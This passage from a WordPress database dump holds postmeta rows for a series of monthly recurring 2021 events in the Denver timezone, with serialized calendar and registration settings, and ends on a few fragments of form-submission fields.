RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128334,263421,'_RTECmaxRegistrations','30'),(128335,263421,'boldgrid_hide_page_title','0'),(128336,263421,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128337,263421,'_EventShowMapLink','1'),(128338,263421,'_EventShowMap','1'),(128339,263421,'_EventVenueID','262305'),(128323,263421,'protect_children',''),(128324,263421,'protect_children',''),(128325,263421,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128333,263421,'_RTEClimitRegistrations','0'),(128322,263421,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128026,263422,'_EventStartDate','2021-05-30 10:00:00'),(128027,263422,'_EventStartDateUTC','2021-05-30 16:00:00'),(128028,263422,'_EventEndDate','2021-05-30 12:00:00'),(128029,263422,'_EventEndDateUTC','2021-05-30 18:00:00'),(128030,263422,'_EventDuration','7200'),(128352,263422,'_EventOrigin','events-calendar'),(128365,263422,'_EventCurrencySymbol',''),(128366,263422,'_EventCurrencyPosition','prefix'),(128367,263422,'_EventCost',''),(128368,263422,'_EventURL',''),(128369,263422,'_EventTimezone','America/Denver'),(128370,263422,'_dp_original','263362'),(128371,263422,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128353,263422,'_EventOrigin','events-calendar'),(128355,263422,'_RTECregistrationsDisabled','1'),(128356,263422,'_RTECdeadlineType','start'),(128357,263422,'_RTECwhoCanRegister','any'),(128351,263422,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128359,263422,'_RTECmaxRegistrations','30'),(128360,263422,'boldgrid_hide_page_title','0'),(128361,263422,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128362,263422,'_EventShowMapLink','1'),(128363,263422,'_EventShowMap','1'),(128364,263422,'_EventVenueID','262305'),(128348,263422,'protect_children',''),(128349,263422,'protect_children',''),(128350,263422,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128358,263422,'_RTEClimitRegistrations','0'),(128347,263422,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128430,263425,'_RTECregistrationsDisabled','1'),(128059,263423,'_EventStartDate','2021-06-27 10:00:00'),(128060,263423,'_EventStartDateUTC','2021-06-27 16:00:00'),(128431,263425,'_RTECdeadlineType','start'),(128061,263423,'_EventEndDate','2021-06-27 12:00:00'),(128062,263423,'_EventEndDateUTC','2021-06-27 18:00:00'),(128063,263423,'_EventDuration','7200'),(128377,263423,'_EventOrigin','events-calendar'),(128390,263423,'_EventCurrencySymbol',''),(128391,263423,'_EventCurrencyPosition','prefix'),(128392,263423,'_EventCost',''),(128393,263423,'_EventURL',''),(128394,263423,'_EventTimezone','America/Denver'),(128395,263423,'_dp_original','263362'),(128396,263423,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128378,263423,'_EventOrigin','events-calendar'),(128380,263423,'_RTECregistrationsDisabled','1'),(128381,263423,'_RTECdeadlineType','start'),(128382,263423,'_RTECwhoCanRegister','any'),(128376,263423,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128384,263423,'_RTECmaxRegistrations','30'),(128385,263423,'boldgrid_hide_page_title','0'),(128386,263423,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128387,263423,'_EventShowMapLink','1'),(128388,263423,'_EventShowMap','1'),(128389,263423,'_EventVenueID','262305'),(128373,263423,'protect_children',''),(128374,263423,'protect_children',''),(128375,263423,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128383,263423,'_RTEClimitRegistrations','0'),(128372,263423,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128432,263425,'_RTECwhoCanRegister','any'),(128433,263425,'_RTEClimitRegistrations','0'),(128092,263424,'_EventStartDate','2021-07-25 10:00:00'),(128093,263424,'_EventStartDateUTC','2021-07-25 16:00:00'),(128094,263424,'_EventEndDate','2021-07-25 12:00:00'),(128095,263424,'_EventEndDateUTC','2021-07-25 18:00:00'),(128096,263424,'_EventDuration','7200'),(128402,263424,'_EventOrigin','events-calendar'),(128415,263424,'_EventCurrencySymbol',''),(128416,263424,'_EventCurrencyPosition','prefix'),(128417,263424,'_EventCost',''),(128418,263424,'_EventURL',''),(128419,263424,'_EventTimezone','America/Denver'),(128420,263424,'_dp_original','263362'),(128421,263424,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128403,263424,'_EventOrigin','events-calendar'),(128405,263424,'_RTECregistrationsDisabled','1'),(128406,263424,'_RTECdeadlineType','start'),(128407,263424,'_RTECwhoCanRegister','any'),(128401,263424,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128409,263424,'_RTECmaxRegistrations','30'),(128410,263424,'boldgrid_hide_page_title','0'),(128411,263424,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128412,263424,'_EventShowMapLink','1'),(128413,263424,'_EventShowMap','1'),(128414,263424,'_EventVenueID','262305'),(128398,263424,'protect_children',''),(128399,263424,'protect_children',''),(128400,263424,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128408,263424,'_RTEClimitRegistrations','0'),(128397,263424,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128436,263425,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128125,263425,'_EventStartDate','2021-08-29 10:00:00'),(128435,263425,'boldgrid_hide_page_title','0'),(128126,263425,'_EventStartDateUTC','2021-08-29 16:00:00'),(128127,263425,'_EventEndDate','2021-08-29 12:00:00'),(128128,263425,'_EventEndDateUTC','2021-08-29 18:00:00'),(128129,263425,'_EventDuration','7200'),(128446,263425,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128428,263425,'_EventOrigin','events-calendar'),(128434,263425,'_RTECmaxRegistrations','30'),(128427,263425,'_EventOrigin','events-calendar'),(128437,263425,'_EventShowMapLink','1'),(128438,263425,'_EventShowMap','1'),(128439,263425,'_EventVenueID','262305'),(128440,263425,'_EventCurrencySymbol',''),(128441,263425,'_EventCurrencyPosition','prefix'),(128442,263425,'_EventCost',''),(128443,263425,'_EventURL',''),(128444,263425,'_EventTimezone','America/Denver'),(128445,263425,'_dp_original','263362'),(128426,263425,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635209;s:13:\"_thumbnail_id\";i:1610635209;s:26:\"_RTECregistrationsDisabled\";i:1610635209;s:17:\"_RTECdeadlineType\";i:1610635209;s:19:\"_RTECwhoCanRegister\";i:1610635209;s:23:\"_RTEClimitRegistrations\";i:1610635209;s:21:\"_RTECmaxRegistrations\";i:1610635209;s:24:\"boldgrid_hide_page_title\";i:1610635209;s:16:\"_EventRecurrence\";i:1610635209;s:17:\"_EventShowMapLink\";i:1610635209;s:13:\"_EventShowMap\";i:1610635209;s:13:\"_EventVenueID\";i:1610635209;s:20:\"_EventCurrencySymbol\";i:1610635209;s:22:\"_EventCurrencyPosition\";i:1610635209;s:10:\"_EventCost\";i:1610635209;s:9:\"_EventURL\";i:1610635209;s:14:\"_EventTimezone\";i:1610635209;s:12:\"_dp_original\";i:1610635209;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635209;s:16:\"tribe_events_cat\";i:1610660409;}'),(126315,263373,'_EventDuration','5400'),(126311,263373,'_EventStartDate','2021-08-01 10:30:00'),(126312,263373,'_EventStartDateUTC','2021-08-01 16:30:00'),(126313,263373,'_EventEndDate','2021-08-01 12:00:00'),(126314,263373,'_EventEndDateUTC','2021-08-01 18:00:00'),(128578,263372,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128574,263372,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(126281,263372,'_EventEndDateUTC','2021-07-04 18:00:00'),(126282,263372,'_EventDuration','5400'),(94090,261744,'_field_37','US'),(94091,261744,'_field_39',''),(94092,261744,'_form_id','4'),(94093,261744,'_seq_num','7'),(94095,71622,'protect_children',''),(94096,71767,'protect_children',''),(94097,71864,'protect_children',''),(94098,72053,'protect_children',''),(94099,72150,'protect_children',''),(94100,72247,'protect_children',''),(94101,72344,'protect_children',''),(94102,72441,'protect_children',''),(94103,72538,'protect_children',''),(94104,72635,'protect_children',''),(94105,72732,'protect_children',''),(94106,70845,'protect_children',''),(94107,56319,'protect_children',''),(94108,56560,'protect_children',''),(94109,56657,'protect_children',''),(94110,56851,'protect_children',''),(94089,261744,'_field_36','CO'),(94081,261743,'_form_id','13'),(94082,261743,'_seq_num','52'),(94083,261744,'_field_30','Laura'),(94084,261744,'_field_31','G